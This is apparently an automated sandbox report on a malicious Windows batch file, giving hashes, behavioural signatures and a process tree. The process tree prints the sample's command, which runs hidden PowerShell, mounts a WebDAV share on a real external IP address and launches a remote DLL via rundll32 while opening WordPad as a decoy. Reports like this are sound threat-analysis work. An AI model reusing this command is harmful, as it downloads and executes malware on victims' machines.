Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
13/07/2024, 10:17
Static task
static1
Behavioral task
behavioral1
Sample
5d247b3658b87ae5c468451740643f7ca686cbf2d8a45d8f6bc11d12c3372c06.bat
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
5d247b3658b87ae5c468451740643f7ca686cbf2d8a45d8f6bc11d12c3372c06.bat
Resource
win10v2004-20240709-en
General
-
Target
5d247b3658b87ae5c468451740643f7ca686cbf2d8a45d8f6bc11d12c3372c06.bat
-
Size
2KB
-
MD5
9df503acd64eed2a008f3cb255416fbc
-
SHA1
3953b57b7e4a6fe003799c19047b74a51584c69a
-
SHA256
5d247b3658b87ae5c468451740643f7ca686cbf2d8a45d8f6bc11d12c3372c06
-
SHA512
aa69e1db429e8d973146badf8e58ab637635a1824208a03b5851f4e8af6a44e7b8efa94edfcaf7d66f471e0911b8ad05059c75cfd318d5c69dc9422a827f0ea8
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2424 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2424 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2424 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1696 wordpad.exe 1696 wordpad.exe 1696 wordpad.exe 1696 wordpad.exe 1696 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2224 wrote to memory of 1696 2224 cmd.exe 29 PID 2224 wrote to memory of 1696 2224 cmd.exe 29 PID 2224 wrote to memory of 1696 2224 cmd.exe 29 PID 2224 wrote to memory of 2424 2224 cmd.exe 30 PID 2224 wrote to memory of 2424 2224 cmd.exe 30 PID 2224 wrote to memory of 2424 2224 cmd.exe 30 PID 2424 wrote to memory of 1076 2424 powershell.exe 32 PID 2424 wrote to memory of 1076 2424 powershell.exe 32 PID 2424 wrote to memory of 1076 2424 powershell.exe 32 PID 2424 wrote to memory of 1172 2424 powershell.exe 33 PID 2424 wrote to memory of 1172 2424 powershell.exe 33 PID 2424 wrote to memory of 1172 2424 powershell.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\5d247b3658b87ae5c468451740643f7ca686cbf2d8a45d8f6bc11d12c3372c06.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:1696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\1567.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:1076
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\1567.dll entry3⤵PID:1172
-
-